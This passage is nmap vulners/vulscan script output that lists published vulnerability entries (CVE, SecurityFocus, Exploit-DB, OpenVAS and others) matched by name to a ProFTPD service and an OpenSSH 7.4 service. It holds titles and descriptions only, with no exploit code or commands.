6802| [CVE-2001-0456] postinst installation script for Proftpd in Debian 2.2 does not properly change the "run as uid/gid root" configuration when the user enables anonymous access, which causes the server to run at a higher privilege than intended.
6803| [CVE-2001-0318] Format string vulnerability in ProFTPD 1.2.0rc2 may allow attackers to execute arbitrary commands by shutting down the FTP server while using a malformed working directory (cwd).
6804| [CVE-2001-0136] Memory leak in ProFTPd 1.2.0rc2 allows remote attackers to cause a denial of service via a series of USER commands, and possibly SIZE commands if the server has been improperly installed.
6805| [CVE-2001-0027] mod_sqlpw module in ProFTPD does not reset a cached password when a user uses the "user" command to change accounts, which allows authenticated attackers to gain privileges of other users.
6806| [CVE-2000-0574] FTP servers such as OpenBSD ftpd, NetBSD ftpd, ProFTPd and Opieftpd do not properly cleanse untrusted format strings that are used in the setproctitle function (sometimes called by set_proc_title), which allows remote attackers to cause a denial of service or execute arbitrary commands.
6807| [CVE-1999-1475] ProFTPd 1.2 compiled with the mod_sqlpw module records user passwords in the wtmp log file, which allows local users to obtain the passwords and gain privileges by reading wtmp, e.g. via the last command.
6808| [CVE-1999-0911] Buffer overflow in ProFTPD, wu-ftpd, and beroftpd allows remote attackers to gain root access via a series of MKD and CWD commands that create nested directories.
6809| [CVE-1999-0368] Buffer overflows in wuarchive ftpd (wu-ftpd) and ProFTPD lead to remote root access, a.k.a. palmetto.
6810|
6811| SecurityFocus - https://www.securityfocus.com/bid/:
6812| [97409] ProFTPD CVE-2017-7418 Local Security Bypass Vulnerability
6813| [89750] ProFTPD CVE-2001-1501 Denial-Of-Service Vulnerability
6814| [88575] ProFTPD CVE-2001-0027 Denial-Of-Service Vulnerability
6815| [84378] Proftpd CVE-2008-7265 Denial-Of-Service Vulnerability
6816| [84329] ProFTPD Out Of Bounds Multiple Memory Corruption Vulnerabilities
6817| [84327] ProFTPD CVE-2016-3125 Diffie Hellman Key Exchange Security Bypass Vulnerability
6818| [82756] ProFTPD CVE-2003-0500 SQL-Injection Vulnerability
6819| [82433] GProFTPD CVE-2005-0484 Remote Security Vulnerability
6820| [77684] ProFTPD Heap Buffer Overflow and Denial of Service Vulnerabilities
6821| [74238] ProFTPD CVE-2015-3306 Information Disclosure Vulnerabilities
6822| [62328] ProFTPD 'mod_sftp_pam' Remote Denial of Service Vulnerability
6823| [57172] ProFTPD Race Condition Local Privilege Escalation Vulnerability
6824| [50631] ProFTPD Prior To 1.3.3g Use-After-Free Remote Code Execution Vulnerability
6825| [46183] ProFTPD 'mod_sftp' Module Integer Overflow Vulnerability
6826| [45150] ProFTPD Backdoor Unauthorized Access Vulnerability
6827| [44933] ProFTPD 'mod_sql' Remote Heap Based Buffer Overflow Vulnerability
6828| [44562] ProFTPD Multiple Remote Vulnerabilities
6829| [36804] ProFTPD mod_tls Module NULL Character CA SSL Certificate Validation Security Bypass Vulnerability
6830| [33722] ProFTPD 'mod_sql' Username SQL Injection Vulnerability
6831| [33650] ProFTPD Character Encoding SQL Injection Vulnerability
6832| [23546] ProFTPD AUTH Multiple Authentication Module Security Bypass Vulnerability
6833| [21587] ProFTPD Controls Module Local Buffer Overflow Vulnerability
6834| [21326] ProFTPD MOD_TLS Remote Buffer Overflow Vulnerability
6835| [20992] ProFTPD SReplace Remote Buffer Overflow Vulnerability
6836| [16535] ProFTPD Mod_Radius Buffer Overflow Vulnerability
6837| [14381] ProFTPD Shutdown Message Format String Vulnerability
6838| [14380] ProFTPD SQLShowInfo SQL Output Format String Vulnerability
6839| [12588] GProFTPD GProstats Remote Format String Vulnerability
6840| [11430] ProFTPD Authentication Delay Username Enumeration Vulnerability
6841| [10252] ProFTPD CIDR Access Control Rule Bypass Vulnerability
6842| [9782] ProFTPD _xlate_ascii_write() Buffer Overrun Vulnerability
6843| [8679] ProFTPD ASCII File Transfer Buffer Overrun Vulnerability
6844| [7974] ProFTPD SQL Injection mod_sql Vulnerability
6845| [6781] ProFTPD 1.2.0rc2 log_pri() Format String Vulnerability
6846| [6341] ProFTPD STAT Command Denial Of Service Vulnerability
6847| [3310] ProFTPD Client Hostname Resolving Vulnerability
6848| [2366] ProFTPD USER Remote Denial of Service Vulnerability
6849| [2185] ProFTPD SIZE Remote Denial of Service Vulnerability
6850| [812] ProFTPD mod_sqlpw Vulnerability
6851| [650] ProFTPD snprintf Vulnerability
6852| [612] ProFTPD Remote Buffer Overflow
6853|
6854| IBM X-Force - https://exchange.xforce.ibmcloud.com:
6855| [80980] ProFTPD FTP commands symlink
6856| [71226] ProFTPD pool code execution
6857| [65207] ProFTPD mod_sftp module denial of service
6858| [64495] ProFTPD sql_prepare_where() buffer overflow
6859| [63658] ProFTPD FTP server backdoor
6860| [63407] mod_sql module for ProFTPD buffer overflow
6861| [63155] ProFTPD pr_data_xfer denial of service
6862| [62909] ProFTPD mod_site_misc directory traversal
6863| [62908] ProFTPD pr_netio_telnet_gets() buffer overflow
6864| [53936] ProFTPD mod_tls SSL certificate security bypass
6865| [48951] ProFTPD mod_sql username percent SQL injection
6866| [48558] ProFTPD NLS support SQL injection protection bypass
6867| [45274] ProFTPD URL cross-site request forgery
6868| [33733] ProFTPD Auth API security bypass
6869| [31461] ProFTPD mod_radius buffer overflow
6870| [30906] ProFTPD Controls (mod_ctrls) module buffer overflow
6871| [30554] ProFTPD mod_tls module tls_x509_name_oneline() buffer overflow
6872| [30147] ProFTPD sreplace() buffer overflow
6873| [21530] ProFTPD mod_sql format string attack
6874| [21528] ProFTPD shutdown message format string attack
6875| [19410] GProFTPD file name format string attack
6876| [18453] ProFTPD SITE CHGRP command allows group ownership modification
6877| [17724] ProFTPD could allow an attacker to obtain valid accounts
6878| [16038] ProFTPD CIDR entry ACL bypass
6879| [15387] ProFTPD off-by-one _xlate_ascii_write function buffer overflow
6880| [12369] ProFTPD mod_sql SQL injection
6881| [12200] ProFTPD ASCII file newline buffer overflow
6882| [10932] ProFTPD long PASS command buffer overflow
6883| [8332] ProFTPD mod_sqlpw stores passwords in the wtmp log file
6884| [7818] ProFTPD ls "
6885| [7816] ProFTPD file globbing denial of service
6886| [7126] ProFTPD fails to resolve hostnames
6887| [6433] ProFTPD format string
6888| [6209] proFTPD /var symlink
6889| [6208] ProFTPD contains configuration error in postinst script when running as root
6890| [5801] proftpd memory leak when using SIZE or USER commands
6891| [5737] ProFTPD system using mod_sqlpw unauthorized access
6892|
6893| Exploit-DB - https://www.exploit-db.com:
6894| [23170] ProFTPD 1.2.7/1.2.8 ASCII File Transfer Buffer Overrun Vulnerability
6895| [22079] ProFTPD 1.2.x STAT Command Denial of Service Vulnerability
6896| [20690] wu-ftpd 2.4/2.5/2.6,Trolltech ftpd 1.2,ProFTPD 1.2,BeroFTPD 1.3.4 FTP glob Expansion Vulnerability
6897| [20536] ProFTPD 1.2 SIZE Remote Denial of Service Vulnerability
6898| [19503] ProFTPD 1.2 pre6 snprintf Vulnerability
6899| [19476] ProFTPD 1.2 pre1/pre2/pre3/pre4/pre5 Remote Buffer Overflow (2)
6900| [19475] ProFTPD 1.2 pre1/pre2/pre3/pre4/pre5 Remote Buffer Overflow (1)
6901| [19087] wu-ftpd 2.4.2,SCO Open Server <= 5.0.5,ProFTPD 1.2 pre1 realpath Vulnerability (2)
6902| [19086] wu-ftpd 2.4.2,SCO Open Server <= 5.0.5,ProFTPD 1.2 pre1 realpath Vulnerability (1)
6903| [18181] FreeBSD ftpd and ProFTPd on FreeBSD Remote r00t Exploit
6904| [16921] ProFTPD-1.3.3c Backdoor Command Execution
6905| [16878] ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
6906| [16852] ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
6907| [16851] ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
6908| [16129] ProFTPD mod_sftp Integer Overflow DoS PoC
6909| [15662] ProFTPD 1.3.3c compromised source remote root Trojan
6910| [15449] ProFTPD IAC Remote Root Exploit
6911| [10044] ProFTPd 1.3.0 mod_ctrls Local Stack Overflow (opensuse)
6912| [8037] ProFTPd with mod_mysql Authentication Bypass Vulnerability
6913| [4312] ProFTPD 1.x (module mod_tls) Remote Buffer Overflow Exploit
6914| [3730] ProFTPD 1.3.0/1.3.0a (mod_ctrls) Local Overflow Exploit (exec-shield)
6915| [3333] ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit 2
6916| [3330] ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit
6917| [3021] ProFTPD <= 1.2.9 rc2 (ASCII File) Remote Root Exploit
6918| [2928] ProFTPD <= 1.3.0a (mod_ctrls support) Local Buffer Overflow PoC
6919| [2856] ProFTPD 1.3.0 (sreplace) Remote Stack Overflow Exploit (meta)
6920| [581] ProFTPD <= 1.2.10 Remote Users Enumeration Exploit
6921| [394] ProFTPd Local pr_ctrls_connect Vulnerability - ftpdctl
6922| [244] ProFTPD <= 1.2.0pre10 Remote Denial of Service Exploit
6923| [241] ProFTPD 1.2.0 (rc2) - memory leakage example Exploit
6924| [110] ProFTPD 1.2.7 - 1.2.9rc2 Remote Root & brute-force Exploit
6925| [107] ProFTPD 1.2.9rc2 ASCII File Remote Root Exploit
6926| [43] ProFTPD 1.2.9RC1 (mod_sql) Remote SQL Injection Exploit
6927|
6928| OpenVAS (Nessus) - http://www.openvas.org:
6929| [900815] ProFTPD Server Remote Version Detection
6930| [900507] ProFTPD Server SQL Injection Vulnerability
6931| [900506] ProFTPD Server Version Detection
6932| [900133] ProFTPD Long Command Handling Security Vulnerability
6933| [863897] Fedora Update for proftpd FEDORA-2011-15765
6934| [863633] Fedora Update for proftpd FEDORA-2011-15741
6935| [863630] Fedora Update for proftpd FEDORA-2011-15740
6936| [862999] Fedora Update for proftpd FEDORA-2011-5040
6937| [862992] Fedora Update for proftpd FEDORA-2011-5033
6938| [862829] Fedora Update for proftpd FEDORA-2011-0613
6939| [862828] Fedora Update for proftpd FEDORA-2011-0610
6940| [862658] Fedora Update for proftpd FEDORA-2010-17091
6941| [862546] Fedora Update for proftpd FEDORA-2010-17220
6942| [862544] Fedora Update for proftpd FEDORA-2010-17098
6943| [861120] Fedora Update for proftpd FEDORA-2007-2613
6944| [831503] Mandriva Update for proftpd MDVSA-2011:181 (proftpd)
6945| [831323] Mandriva Update for proftpd MDVSA-2011:023 (proftpd)
6946| [831242] Mandriva Update for proftpd MDVSA-2010:227 (proftpd)
6947| [830311] Mandriva Update for proftpd MDKSA-2007:130 (proftpd)
6948| [830197] Mandriva Update for proftpd MDKA-2007:089 (proftpd)
6949| [801640] ProFTPD Denial of Service Vulnerability
6950| [801639] ProFTPD Multiple Remote Vulnerabilities
6951| [103331] ProFTPD Prior To 1.3.3g Use-After-Free Remote Code Execution Vulnerability
6952| [100933] ProFTPD Backdoor Unauthorized Access Vulnerability
6953| [100316] ProFTPD mod_tls Module NULL Character CA SSL Certificate Validation Security Bypass Vulnerability
6954| [71967] Slackware Advisory SSA:2012-041-04 proftpd
6955| [70586] FreeBSD Ports: proftpd, proftpd-mysql
6956| [70560] Debian Security Advisory DSA 2346-2 (proftpd-dfsg)
6957| [70559] Debian Security Advisory DSA 2346-1 (proftpd-dfsg)
6958| [69584] Slackware Advisory SSA:2011-095-01 proftpd
6959| [69327] Debian Security Advisory DSA 2191-1 (proftpd-dfsg)
6960| [69322] Debian Security Advisory DSA 2185-1 (proftpd-dfsg)
6961| [68801] Slackware Advisory SSA:2010-357-02 proftpd
6962| [68702] FreeBSD Ports: proftpd
6963| [68697] FreeBSD Ports: proftpd
6964| [68466] Slackware Advisory SSA:2010-305-03 proftpd
6965| [66585] Fedora Core 11 FEDORA-2009-13236 (proftpd)
6966| [66583] Fedora Core 12 FEDORA-2009-13250 (proftpd)
6967| [66291] Fedora Core 10 FEDORA-2009-11666 (proftpd)
6968| [66290] Fedora Core 11 FEDORA-2009-11649 (proftpd)
6969| [66205] Debian Security Advisory DSA 1925-1 (proftpd-dfsg)
6970| [66091] Mandrake Security Advisory MDVSA-2009:288 (proftpd)
6971| [64966] Fedora Core 10 FEDORA-2009-9386 (proftpd)
6972| [63630] FreeBSD Ports: proftpd, proftpd-mysql
6973| [63573] Debian Security Advisory DSA 1727-1 (proftpd-dfsg)
6974| [63558] Gentoo Security Advisory GLSA 200903-27 (proftpd)
6975| [63497] Debian Security Advisory DSA 1730-1 (proftpd-dfsg)
6976| [63128] Fedora Core 8 FEDORA-2009-0195 (proftpd)
6977| [63119] Fedora Core 10 FEDORA-2009-0089 (proftpd)
6978| [63117] Fedora Core 9 FEDORA-2009-0064 (proftpd)
6979| [63061] Debian Security Advisory DSA 1689-1 (proftpd-dfsg)
6980| [61656] FreeBSD Ports: proftpd, proftpd-mysql
6981| [58019] Gentoo Security Advisory GLSA 200702-02 (proftpd)
6982| [57939] Gentoo Security Advisory GLSA 200611-26 (proftpd)
6983| [57786] Debian Security Advisory DSA 1245-1 (proftpd)
6984| [57725] FreeBSD Ports: proftpd, proftpd-mysql
6985| [57703] Slackware Advisory SSA:2006-335-02 proftpd
6986| [57686] Debian Security Advisory DSA 1222-2 (proftpd)
6987| [57683] Debian Security Advisory DSA 1222-1 (proftpd)
6988| [57592] Debian Security Advisory DSA 1218-1 (proftpd)
6989| [57576] FreeBSD Ports: proftpd, proftpd-mysql
6990| [55234] Debian Security Advisory DSA 795-2 (proftpd)
6991| [55007] Gentoo Security Advisory GLSA 200508-02 (proftpd)
6992| [54858] Gentoo Security Advisory GLSA 200502-26 (GProFTPD)
6993| [54569] Gentoo Security Advisory GLSA 200405-09 (proftpd)
6994| [54483] FreeBSD Ports: proftpd, proftpd-mysql
6995| [53882] Slackware Advisory SSA:2003-259-02 ProFTPD Security Advisory
6996| [53794] Debian Security Advisory DSA 032-1 (proftpd)
6997| [53791] Debian Security Advisory DSA 029-1 (proftpd)
6998| [52532] FreeBSD Ports: proftpd
6999| [52464] FreeBSD Ports: proftpd
7000| [15484] proftpd < 1.2.11 remote user enumeration
7001|
7002| SecurityTracker - https://www.securitytracker.com:
7003| [1028040] ProFTPD MKD/XMKD Race Condition Lets Local Users Gain Elevated Privileges
7004| [1026321] ProFTPD Use-After-Free Memory Error Lets Remote Authenticated Users Execute Arbitrary Code
7005| [1020945] ProFTPD Request Processing Bug Permits Cross-Site Request Forgery Attacks
7006| [1017931] ProFTPD Auth API State Error May Let Remote Users Access the System in Certain Cases
7007| [1017167] ProFTPD sreplace() Off-by-one Bug Lets Remote Users Execute Arbitrary Code
7008| [1012488] ProFTPD SITE CHGRP Command Lets Remote Authenticated Users Modify File/Directory Group Ownership
7009| [1011687] ProFTPd Login Timing Differences Disclose Valid User Account Names to Remote Users
7010| [1009997] ProFTPD Access Control Bug With CIDR Addresses May Let Remote Authenticated Users Access Files
7011| [1009297] ProFTPD _xlate_ascii_write() Off-By-One Buffer Overflows Let Remote Users Execute Arbitrary Code With Root Privileges
7012| [1007794] ProFTPD ASCII Mode File Upload Buffer Overflow Lets Certain Remote Users Execute Arbitrary Code
7013| [1007020] ProFTPD Input Validation Flaw When Authenticating Against Postgresql Using 'mod_sql' Lets Remote Users Gain Access
7014| [1003019] ProFTPD FTP Server May Allow Local Users to Execute Code on the Server
7015| [1002354] ProFTPD Reverse DNS Feature Fails to Check Forward-to-Reverse DNS Mappings
7016| [1002148] ProFTPD Site and Quote Commands May Allow Remote Users to Execute Arbitrary Commands on the Server
7017|
7018| OSVDB - http://www.osvdb.org:
7019| [89051] ProFTPD Multiple FTP Command Handling Symlink Arbitrary File Overwrite
7020| [77004] ProFTPD Use-After-Free Response Pool Allocation List Parsing Remote Memory Corruption
7021| [70868] ProFTPD mod_sftp Component SSH Payload DoS
7022| [70782] ProFTPD contrib/mod_sql.c sql_prepare_where Function Crafted Username Handling Remote Overflow
7023| [69562] ProFTPD on ftp.proftpd.org Compromised Source Packages Trojaned Distribution
7024| [69200] ProFTPD pr_data_xfer Function ABOR Command Remote DoS
7025| [68988] ProFTPD mod_site_misc Module Multiple Command Traversal Arbitrary File Manipulation
7026| [68985] ProFTPD netio.c pr_netio_telnet_gets Function TELNET_IAC Escape Sequence Remote Overflow
7027| [59292] ProFTPD mod_tls Module Certificate Authority (CA) subjectAltName Field Null Byte Handling SSL MiTM Weakness
7028| [57311] ProFTPD contrib/mod_ratio.c Multiple Unspecified Buffer Handling Issues
7029| [57310] ProFTPD Multiple Unspecified Overflows
7030| [57309] ProFTPD src/support.c Unspecified Buffer Handling Issue
7031| [57308] ProFTPD modules/mod_core.c Multiple Unspecified Overflows
7032| [57307] ProFTPD Multiple Modules Unspecified Overflows
7033| [57306] ProFTPD contrib/mod_pam.c Multiple Unspecified Buffer Handling Issues
7034| [57305] ProFTPD src/main.c Unspecified Overflow
7035| [57304] ProFTPD src/log.c Logfile Handling Unspecified Race Condition
7036| [57303] ProFTPD modules/mod_auth.c Unspecified Issue
7037| [51954] ProFTPD Server NLS Support mod_sql_* Encoded Multibyte Character SQL Injection Protection Bypass
7038| [51953] ProFTPD Server mod_sql username % Character Handling SQL Injection
7039| [51849] ProFTPD Character Encoding SQL Injection
7040| [51720] ProFTPD NLST Command Argument Handling Remote Overflow
7041| [51719] ProFTPD MKDIR Command Directory Name Handling Remote Overflow
7042| [48411] ProFTPD FTP Command Truncation CSRF
7043| [34602] ProFTPD Auth API Multiple Auth Module Authentication Bypass
7044| [31509] ProFTPD mod_ctrls Module pr_ctrls_recv_request Function Local Overflow
7045| [30719] mod_tls Module for ProFTPD tls_x509_name_oneline Function Remote Overflow
7046| [30660] ProFTPD CommandBufferSize Option cmd_loop() Function DoS
7047| [30267] ProFTPD src/support.c sreplace() Function Remote Overflow
7048| [23063] ProFTPD mod_radius Password Overflow DoS
7049| [20212] ProFTPD Host Reverse Resolution Failure ACL Bypass
7050| [18271] ProFTPD mod_sql SQLShowInfo Directive Format String
7051| [18270] ProFTPD ftpshut Shutdown Message Format String
7052| [14012] GProftpd gprostats Utility Log Parser Remote Format String
7053| [10769] ProFTPD File Transfer Newline Character Overflow
7054| [10768] ProFTPD STAT Command Remote DoS
7055| [10758] ProFTPD Login Timing Account Name Enumeration
7056| [10173] ProFTPD mod_sqlpw wtmp Authentication Credential Disclosure
7057| [9507] PostgreSQL Authentication Module (mod_sql) for ProFTPD USER Name Parameter SQL Injection
7058| [9163] ProFTPD MKDIR Directory Creation / Change Remote Overflow (palmetto)
7059| [7166] ProFTPD SIZE Command Memory Leak Remote DoS
7060| [7165] ProFTPD USER Command Memory Leak DoS
7061| [5744] ProFTPD CIDR IP Subnet ACL Bypass
7062| [5705] ProFTPD Malformed cwd Command Format String
7063| [5638] ProFTPD on Debian Linux postinst Installation Privilege Escalation
7064| [4134] ProFTPD in_xlate_ascii_write() Function RETR Command Remote Overflow
7065| [144] ProFTPD src/log.c log_xfer() Function Remote Overflow
7066|_
706722/tcp open ssh OpenSSH 7.4 (protocol 2.0)
7068| vulners:
7069| cpe:/a:openbsd:openssh:7.4:
7070| CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919
7071|_ CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
7072| vulscan: VulDB - https://vuldb.com:
7073| [130671] gsi-openssh-server 7.9p1 on Fedora /etc/gsissh/sshd_config weak authentication
7074| [130371] OpenSSH 7.9 scp Man-in-the-Middle directory traversal
7075| [130370] OpenSSH 7.9 Man-in-the-Middle spoofing
7076| [130369] OpenSSH 7.9 Encoding progressmeter.c refresh_progress_meter() spoofing
7077| [129007] OpenSSH 7.9 scp Client scp.c Filename privilege escalation
7078| [123343] OpenSSH up to 7.8 GSS2 auth-gss2.c information disclosure
7079| [123011] OpenSSH up to 7.7 auth2-gss.c Request information disclosure
7080| [112267] OpenSSH up to 7.3 sshd kex.c/packet.c NEWKEYS Message denial of service
7081| [108627] OpenSSH up to 7.5 Readonly Mode sftp-server.c process_open unknown vulnerability
7082| [94611] OpenSSH up to 7.3 Access Control privilege escalation
7083| [94610] OpenSSH up to 7.3 Shared Memory Manager privilege escalation
7084| [94608] OpenSSH up to 7.3 Unix-Domain Socket privilege escalation
7085| [94607] OpenSSH up to 7.3 Forwarded Agent Channel privilege escalation
7086| [90671] OpenSSH up to 7.2 auth-passwd.c auth_password denial of service
7087| [90405] OpenSSH up to 7.2p2 sshd information disclosure
7088| [90404] OpenSSH up to 7.2p2 sshd information disclosure
7089| [90403] OpenSSH up to 7.2p2 sshd CPU Exhaustion denial of service
7090| [89622] OpenSSH 7.2p2 Authentication Username information disclosure
7091| [81320] OpenSSH up to 7.2p1 X11 Authentication Credential xauth privilege escalation
7092| [80656] OpenBSD OpenSSH 7.1 X11 Forwarding privilege escalation
7093| [80330] OpenSSH up to 7.1p1 packet.c ssh_packet_read_poll2 memory corruption
7094|
7095| MITRE CVE - https://cve.mitre.org:
7096| [CVE-2010-4755] The (1) remote_glob function in sftp-glob.c and the (2) process_put function in sftp.c in OpenSSH 5.8 and earlier, as used in FreeBSD 7.3 and 8.1, NetBSD 5.0.2, OpenBSD 4.7, and other products, allow remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in SSH_FXP_STAT requests to an sftp daemon, a different vulnerability than CVE-2010-2632.
7097| [CVE-1999-0661] A system is running a version of software that was replaced with a Trojan Horse at one of its distribution points, such as (1) TCP Wrappers 7.6, (2) util-linux 2.9g, (3) wuarchive ftpd (wuftpd) 2.2 and 2.1f, (4) IRC client (ircII) ircII 2.2.9, (5) OpenSSH 3.4p1, or (6) Sendmail 8.12.6.
7098|
7099| SecurityFocus - https://www.securityfocus.com/bid/:
7100| [102780] OpenSSH CVE-2016-10708 Multiple Denial of Service Vulnerabilities
7101| [101552] OpenSSH 'sftp-server.c' Remote Security Bypass Vulnerability
7102| [94977] OpenSSH CVE-2016-10011 Local Information Disclosure Vulnerability
7103| [94975] OpenSSH CVE-2016-10012 Security Bypass Vulnerability
7104| [94972] OpenSSH CVE-2016-10010 Privilege Escalation Vulnerability
7105| [94968] OpenSSH CVE-2016-10009 Remote Code Execution Vulnerability
7106| [93776] OpenSSH 'ssh/kex.c' Denial of Service Vulnerability
7107| [92212] OpenSSH CVE-2016-6515 Denial of Service Vulnerability
7108| [92210] OpenSSH CBC Padding Weak Encryption Security Weakness
7109| [92209] OpenSSH MAC Verification Security Bypass Vulnerability
7110| [91812] OpenSSH CVE-2016-6210 User Enumeration Vulnerability
7111| [90440] OpenSSH CVE-2004-1653 Remote Security Vulnerability
7112| [90340] OpenSSH CVE-2004-2760 Remote Security Vulnerability
7113| [89385] OpenSSH CVE-2005-2666 Local Security Vulnerability
7114| [88655] OpenSSH CVE-2001-1382 Remote Security Vulnerability
7115| [88513] OpenSSH CVE-2000-0999 Remote Security Vulnerability
7116| [88367] OpenSSH CVE-1999-1010 Local Security Vulnerability
7117| [87789] OpenSSH CVE-2003-0682 Remote Security Vulnerability
7118| [86187] OpenSSH 'session.c' Local Security Bypass Vulnerability
7119| [86144] OpenSSH CVE-2007-2768 Remote Security Vulnerability
7120| [84427] OpenSSH CVE-2016-1908 Security Bypass Vulnerability
7121| [84314] OpenSSH CVE-2016-3115 Remote Command Injection Vulnerability
7122| [84185] OpenSSH CVE-2006-4925 Denial-Of-Service Vulnerability
7123| [81293] OpenSSH CVE-2016-1907 Denial of Service Vulnerability
7124| [80698] OpenSSH CVE-2016-0778 Heap Based Buffer Overflow Vulnerability
7125| [80695] OpenSSH CVE-2016-0777 Information Disclosure Vulnerability
7126| [76497] OpenSSH CVE-2015-6565 Local Security Bypass Vulnerability
7127| [76317] OpenSSH PAM Support Multiple Remote Code Execution Vulnerabilities
7128| [75990] OpenSSH Login Handling Security Bypass Weakness
7129| [75525] OpenSSH 'x11_open_helper()' Function Security Bypass Vulnerability
7130| [71420] Portable OpenSSH 'gss-serv-krb5.c' Security Bypass Vulnerability
7131| [68757] OpenSSH Multiple Remote Denial of Service Vulnerabilities
7132| [66459] OpenSSH Certificate Validation Security Bypass Vulnerability
7133| [66355] OpenSSH 'child_set_env()' Function Security Bypass Vulnerability
7134| [65674] OpenSSH 'ssh-keysign.c' Local Information Disclosure Vulnerability
7135| [65230] OpenSSH 'schnorr.c' Remote Memory Corruption Vulnerability
7136| [63605] OpenSSH 'sshd' Process Remote Memory Corruption Vulnerability
7137| [61286] OpenSSH Remote Denial of Service Vulnerability
7138| [58894] GSI-OpenSSH PAM_USER Security Bypass Vulnerability
7139| [58162] OpenSSH CVE-2010-5107 Denial of Service Vulnerability
7140| [54114] OpenSSH 'ssh_gssapi_parse_ename()' Function Denial of Service Vulnerability
7141| [51702] Debian openssh-server Forced Command Handling Information Disclosure Vulnerability
7142| [50416] Linux Kernel 'kdump' and 'mkdumprd' OpenSSH Integration Remote Information Disclosure Vulnerability
7143| [49473] OpenSSH Ciphersuite Specification Information Disclosure Weakness
7144| [48507] OpenSSH 'pam_thread()' Remote Buffer Overflow Vulnerability
7145| [47691] Portable OpenSSH 'ssh-keysign' Local Unauthorized Access Vulnerability
7146| [46155] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
7147| [45304] OpenSSH J-PAKE Security Bypass Vulnerability
7148| [36552] Red Hat Enterprise Linux OpenSSH 'ChrootDirectory' Option Local Privilege Escalation Vulnerability
7149| [32319] OpenSSH CBC Mode Information Disclosure Vulnerability
7150| [30794] Red Hat OpenSSH Backdoor Vulnerability
7151| [30339] OpenSSH 'X11UseLocalhost' X11 Forwarding Session Hijacking Vulnerability
7152| [30276] Debian OpenSSH SELinux Privilege Escalation Vulnerability
7153| [28531] OpenSSH ForceCommand Command Execution Weakness
7154| [28444] OpenSSH X Connections Session Hijacking Vulnerability
7155| [26097] OpenSSH LINUX_AUDIT_RECORD_EVENT Remote Log Injection Weakness
7156| [25628] OpenSSH X11 Cookie Local Authentication Bypass Vulnerability
7157| [23601] OpenSSH S/Key Remote Information Disclosure Vulnerability
7158| [20956] OpenSSH Privilege Separation Key Signature Weakness
7159| [20418] OpenSSH-Portable Existing Password Remote Information Disclosure Weakness
7160| [20245] OpenSSH-Portable GSSAPI Authentication Abort Information Disclosure Weakness
7161| [20241] Portable OpenSSH GSSAPI Remote Code Execution Vulnerability
7162| [20216] OpenSSH Duplicated Block Remote Denial of Service Vulnerability
7163| [16892] OpenSSH Remote PAM Denial Of Service Vulnerability
7164| [14963] OpenSSH LoginGraceTime Remote Denial Of Service Vulnerability
7165| [14729] OpenSSH GSSAPI Credential Disclosure Vulnerability
7166| [14727] OpenSSH DynamicForward Inadvertent GatewayPorts Activation Vulnerability
7167| [11781] OpenSSH-portable PAM Authentication Remote Information Disclosure Vulnerability
7168| [9986] RCP, OpenSSH SCP Client File Corruption Vulnerability
7169| [9040] OpenSSH PAM Conversation Memory Scrubbing Weakness
7170| [8677] Multiple Portable OpenSSH PAM Vulnerabilities
7171| [8628] OpenSSH Buffer Mismanagement Vulnerabilities
7172| [7831] OpenSSH Reverse DNS Lookup Access Control Bypass Vulnerability
7173| [7482] OpenSSH Remote Root Authentication Timing Side-Channel Weakness
7174| [7467] OpenSSH-portable Enabled PAM Delay Information Disclosure Vulnerability
7175| [7343] OpenSSH Authentication Execution Path Timing Information Leakage Weakness
7176| [6168] OpenSSH Visible Password Vulnerability
7177| [5374] OpenSSH Trojan Horse Vulnerability
7178| [5093] OpenSSH Challenge-Response Buffer Overflow Vulnerabilities
7179| [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
7180| [4241] OpenSSH Channel Code Off-By-One Vulnerability
7181| [3614] OpenSSH UseLogin Environment Variable Passing Vulnerability
7182| [3560] OpenSSH Kerberos Arbitrary Privilege Elevation Vulnerability
7183| [3369] OpenSSH Key Based Source IP Access Control Bypass Vulnerability
7184| [3345] OpenSSH SFTP Command Restriction Bypassing Vulnerability
7185| [2917] OpenSSH PAM Session Evasion Vulnerability
7186| [2825] OpenSSH Client X11 Forwarding Cookie Removal File Symbolic Link Vulnerability
7187| [2356] OpenSSH Private Key Authentication Check Vulnerability
7188| [1949] OpenSSH Client Unauthorized Remote Forwarding Vulnerability
7189| [1334] OpenSSH UseLogin Vulnerability
7190|
7191| IBM X-Force - https://exchange.xforce.ibmcloud.com:
7192| [83258] GSI-OpenSSH auth-pam.c security bypass
7193| [82781] OpenSSH time limit denial of service
7194| [82231] OpenSSH pam_ssh_agent_auth PAM code execution
7195| [74809] OpenSSH ssh_gssapi_parse_ename denial of service
7196| [72756] Debian openssh-server commands information disclosure
7197| [68339] OpenSSH pam_thread buffer overflow
7198| [67264] OpenSSH ssh-keysign unauthorized access
7199| [65910] OpenSSH remote_glob function denial of service
7200| [65163] OpenSSH certificate information disclosure
7201| [64387] OpenSSH J-PAKE security bypass
7202| [63337] Cisco Unified Videoconferencing OpenSSH weak security
7203| [46620] OpenSSH and multiple SSH Tectia products CBC mode information disclosure
7204| [45202] OpenSSH signal handler denial of service
7205| [44747] RHEL OpenSSH backdoor
7206| [44280] OpenSSH PermitRootLogin information disclosure
7207| [44279] OpenSSH sshd weak security
7208| [44037] OpenSSH sshd SELinux role unauthorized access
7209| [43940] OpenSSH X11 forwarding information disclosure
7210| [41549] OpenSSH ForceCommand directive security bypass
7211| [41438] OpenSSH sshd session hijacking
7212| [40897] OpenSSH known_hosts weak security
7213| [40587] OpenSSH username weak security
7214| [37371] OpenSSH username data manipulation
7215| [37118] RHSA update for OpenSSH privilege separation monitor authentication verification weakness not installed
7216| [37112] RHSA update for OpenSSH signal handler race condition not installed
7217| [37107] RHSA update for OpenSSH identical block denial of service not installed
7218| [36637] OpenSSH X11 cookie privilege escalation
7219| [35167] OpenSSH packet.c newkeys[mode] denial of service
7220| [34490] OpenSSH OPIE information disclosure
